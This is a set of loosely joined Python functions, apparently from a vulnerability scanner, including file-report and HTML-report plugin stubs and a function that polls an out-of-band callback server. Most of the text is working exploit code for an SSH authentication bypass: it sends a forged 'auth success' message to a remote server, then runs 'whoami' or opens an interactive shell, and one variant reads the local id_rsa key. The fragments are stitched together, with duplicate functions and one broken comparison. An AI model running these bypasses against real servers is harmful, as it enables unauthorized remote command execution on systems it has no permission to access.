def password_auth_bypass_test(hostname, port): bufsize = 2048 command = 'whoami' sock = socket.socket() try: sock.connect((hostname, int(port))) message = paramiko.message.Message() transport = paramiko.transport.Transport(sock) transport.start_client() message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) transport._send_message(message) client = transport.open_session(timeout=10) client.exec_command(command) stdout = client.makefile("rb", bufsize) stderr = client.makefile_stderr("rb", bufsize) cmd_out = stdout.read().decode() + stderr.read().decode() print(cmd_out) return True if 'root' in cmd_out else False except paramiko.SSHException: logger.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable") return False except socket.error: logger.debug("Unable to connect.") return False
def init(self): debug_msg = "[PLUGIN] file_record plugin init..." logger.debug(debug_msg) logger.info("[PLUGIN] The data will be recorded in {}".format(self.filename)) if os.path.exists(self.filename): raise Exception("The {} has existed".format(self.filename)) self.file = open(self.filename, 'a+')
def poll(self): count = 3 result = [] while count: try: url = f"https://{self.server}/poll?id={self.correlation_id}&secret={self.secret}" res = self.session.get(url, headers=self.headers, verify=False).json() aes_key, data_list = res['aes_key'], res['data'] for i in data_list: decrypt_data = self.decrypt_data(aes_key, i) result.append(decrypt_data) return result except Exception as e: logger.debug(e) count -= 1 time.sleep(1) continue return []
def fake_key_bypass_test(hostname, port, username='******', keyfile=None, command='whoami'): try: if keyfile is None: keyfile = os.path.join(os.environ['HOME'], '.ssh', 'id_rsa') paramiko.auth_handler.AuthHandler._server_handler_table.update( {paramiko.common.MSG_USERAUTH_REQUEST: auth_accept}) client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(hostname, port=int(port), username=username, password="", pkey=None, key_filename=keyfile) stdin, stdout, stderr = client.exec_command(command) cmd_output = stdout.read() client.close() return True if cmd_output == 'root' else False except FileNotFoundError: logger.debug("Generate a keyfile for tool to bypass remote/local server credentials.") return False except paramiko.SSHException: logger.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable") return False except socket.error: logger.debug("Unable to connect.") return False
def password_auth_bypass_test(hostname, port): sock = socket.socket() try: sock.connect((hostname, int(port))) message = paramiko.message.Message() transport = paramiko.transport.Transport(sock) transport.start_client() message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) transport._send_message(message) client = transport.open_session(timeout=10) client.invoke_shell() return True except paramiko.SSHException as e: logger.debug( "TCPForwarding disabled on remote server can't connect. Not Vulnerable" ) return False except socket.error: logger.debug("Unable to connect.") return False
def init(self): debug_msg = "[PLUGIN] html_report plugin init..." logger.debug(debug_msg)